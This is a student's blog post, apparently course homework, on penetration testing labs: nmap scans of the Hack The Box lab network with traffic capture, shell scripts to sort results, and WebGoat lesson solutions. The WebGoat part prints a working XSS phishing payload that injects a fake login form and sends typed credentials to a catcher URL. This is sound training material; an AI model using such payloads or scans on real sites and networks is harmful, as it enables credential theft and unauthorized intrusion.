Penetration testing exercises – h2

EDIT: This is a homework assignment of Tero Karvinen’s penetration testing course.

The penetration testing continues with Hack The Box penetration testing labs, basic nmap usage, and some more WebGoat exercises. I’m using Kali Linux in VirtualBox for the scanning, and WebGoat runs inside docker on my working Arch.

a) Ensure VPN tunnel is functioning

One has to be careful when doing port scans as it is most likely criminalized in your country. So we are making sure that the VPN tunnel to the Hack The Box (HTB) network is functioning and we are scanning the right network.

Got the VPN tokens from HTB, and I start the openvpn tunnel. I’m making it a background process so I can keep the same terminal. The command ‘fg’ brings the process to foreground, and can be terminated with ctrl-C. I’m pinging a lab machine that lives at 10.10.10.171.

Screenshot_2020-04-10_09-44-48

Screenshot_2020-04-10_09-36-03

Here are the commands:

$ sudo openvpn tqre.ovpn &
$ ip a
$ ip route
$ ping 10.10.10.171 -c 1
$ jobs
$ fg
<Ctrl-C pressed: ^C is shown on the output>
$ ping 10.10.10.171 -c 1

This confirms VPN tunnel is working as expected. Really have to remember to put it back on before proceeding! It’s probably wiser to leave the openvpn process in foreground and take the &-sign away.

$ sudo openvpn tqre.ovpn

b) Active scanning the HTB network with nmap

Knowing your tools lessen the probability of ending up in jail doing the wrong thing inadvertently. Assuming nmap’s ‘Stealth scan’ is stealthy is like assuming you save money when you buy stuff.

Previous lecture introduced pythonpy -package, which looked like a convenient way to pipe stuff into python code on the fly:

$ apt-cache search pythonpy
pythonpy - 'python -c', with tab completion and shorthand

From various Internet sources and notes from the lecture, I’ll scan the whole HTB LAN. I’m also going to monitor the traffic on the tun0 interface with tshark. And I’ll use tcpdump -program to capture all the scan traffic for later examination. One terminal for each command.

$ sudo tshark -i tun0
$ sudo tcpdump -i tun0 -w HTBlanscan.pcap
$ time sudo nmap -v 10.10.10.0/24 -oA HTBlanscan

‘-oA’ option with nmap writes the scan results in 3 different files for further processing. I also want to know how long the scan takes. Here is a screenshot of the scan in progress:

Screenshot_2020-04-10_11-41-58

Scan took ~150 seconds. Next I’ll get the hosts that the scan found into a file:

$ grep Up HTBlanscan.gnmap | py -x 'x.split()[1]' > HTBhostIPs
$ cat HTBhostIPs

Screenshot_2020-04-10_11-53-09

Now I’m starting to think, how to get neatly information about the scans into individual directories… awk and bash and so on. Automate everything!

#!/bin/bash
for IP in $(awk -F'.' '{print $4}' HTBhostIPs); do
  mkdir $IP
  sed -n "/10.10.10.$IP/,/^$/p" HTBlanscan.nmap > $IP/scanreport.txt
done

Yay! We have directory for each server, and the initial scan result in a file!

$ ls -R

Screenshot_2020-04-10_12-48-32

More information with nmap

I found a few cheatsheet/tutorials, which give a good introduction of how to work with nmap. Of course, the manpage is very informational, and nmap.org has it all.

https://www.edureka.co/blog/nmap-tutorial/
https://hackertarget.com/nmap-cheatsheet-a-quick-reference-guide/

Basic information from each target machine is now neatly organized. Next we want some more details. I’ll start with one server to test the -sV switch. Again, I’ll save all the network traffic with tcpdump, and monitor the process with tshark. Tcpdump performs faster (gut feeling), and tshark’s output is more readable. I’ll go with an target (10.10.10.171) that is considered easy, as I want later to hack that box!

For starters I did 2 scans:

$ time sudo nmap -sV --script=banner 10.10.10.171 -oA 001_banners
$ time sudo nmap -sV 10.10.10.171 -oA 002_nV

Here is a screenshot of the results:

Screenshot_2020-04-11_12-42-36

What did the banner scripts actually do? They took almost 4 times longer. Also we only scanned only 1000 ports out of 2^16.

The faster -sV option could be used on the whole HTB LAN. Essentially the information looks the same, but there must be something the banner scripts. I’ll leave that for later.

HTB LAN version information with -sV

I’ll use the list of hosts generated earlier with -iL option.

$ time sudo nmap -sV -iL HTBhostIPs -oA HTBlan_sV

This one took 7 minutes… Lets take a look at the results, but first I’d like to put them neatly into directories 😉 The script I made earlier does this with small modifications. I’ll append the results to the same file that’s already there.

I also want to add the scan options to the file. They can be found on the very first line of the scan.

#!/bin/bash
for IP in $(awk -F'.' '{print $4} HTBhotIPs); do
    echo $(head -1 HTBlan_sV.nmap) >> $IP/scanreport.txt
    sed -n "/10.10.10.$IP/,/^$/p" HTBlan_sV.nmap >> $IP/scanreport.txt
done

After running both scan and the script, lets look at the information gathered from 10.10.10.172

$ cat 172/scanreport.txt

Screenshot_2020-04-11_13-51-17

Looking at the results we have on port 636 in this particular server: first scan says it is ldapssl service, but the more intense version scan says it’s tcpwrapped. Looks like the basic scan is just telling what the port is usually used for.

There is one more ‘standard’ flag to use: ‘-A’. This should tell us also the operating system. I’ll run a scan with the same techniques on the HTB LAN network using:

$ time sudo nmap -A -iL HTBhostIPs -oA HTBlan_A

This was by far the most time consuming scan: 22,5 minutes, so I expect the results to be more detailed, with a 11M pcap file along.

The data is lot more detailed indeed, it seems that scripts are triggered according to services discovered, and information is extraced accordingly. These are from a Windows host, smb is a Server Message Block, which is a distributed filesystem…

Screenshot_2020-04-11_19-20-24

But distributing this data into directories with scripts turned out not to be as straightforward. There are blank lines and some servers have way more information than others. I’ll skip the script writing part for now… the scans are there, it’s simple to fish the right one when I descend to hack the boxes…

More?

Is there more to do with active scanning? Oh yes there is: nmap comes equipped with scripts made with NSE, which stands for Nmap Scripting Engine. They are located in ‘/usr/share/nmap/scripts/’. As far as I can tell, some of these are run with the ‘-A’ -tag.

There is already tons of information to look into, not forgetting the pcap files I created with tcpdump. A deep insight what actually went on when scanning was performed in those capture files.

Faster?

If looking for speed instead of versatility: masscan is the one to use. Nmap has also the options -T<0-5>, higher is faster.

c) WebGoat (7.1) – more lessons

Code Quality: Discover clues in the HTML
Look! Someone left credentials in the HTML comments. TY for admin access…

Concurrency: Thread Safety Problems & Shopping Cart Concurrency Flaw
Using 2 browsers at the same time, first one gets solved just entering the given usernames in different browsers (different tabs work too?), the browser that presses the submit button right after the first one gets to see first one’s information.

The second one is similar. I found the right sequence with trial and error: make your way with cheap order to purchase window, then update the items on a second browser. When you confirm the purchase, the price stays what it was earlier.

Cross-Site Scripting (XSS): Phishing with XSS
The following code pasted to the search bar makes a form and sends the user credentials on a buttonpress to a malicious localhost address:

<br>
<form>
Username:<input type="text" id="username"></input><br>
Password:<input type="password" id="pwd"></input><br>
<input type="submit" value="Submit" onclick=send()>
</form>

<script>
function send() {
    var username = document.getElementById("username").value;
    var pwd = document.getElementById("pwd").value;
    var url = "http://localhost:8080/WebGoat/catcher?PROPERTY=yes ";
    url += "&user=" + username;
    url += "&password=" + pwd;
    var http = new XMLHttpRequest();
    http.open("GET", url, false);
    http.send();	
}
</script>

e) Hack the Box: go for one machine!

I did a few preliminary scans on my first chosen target: 10.10.10.171

The post continues here behind a password: no spoilers. And the password is: ZEdWeWIyNXdaVzUwWlhOMENnPT0K

 

Published by:

Tuomo Kuure (tqre)

A professional double bassist and a ICT infrastructure student with good Linux skills. Coding skills include Python, shell scripting and Java. C and asm bubbling under. Main interests are Linux-related: cloud, configuration management, security and kernel programming.

2 Comments

2 thoughts on “Penetration testing exercises – h2”

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s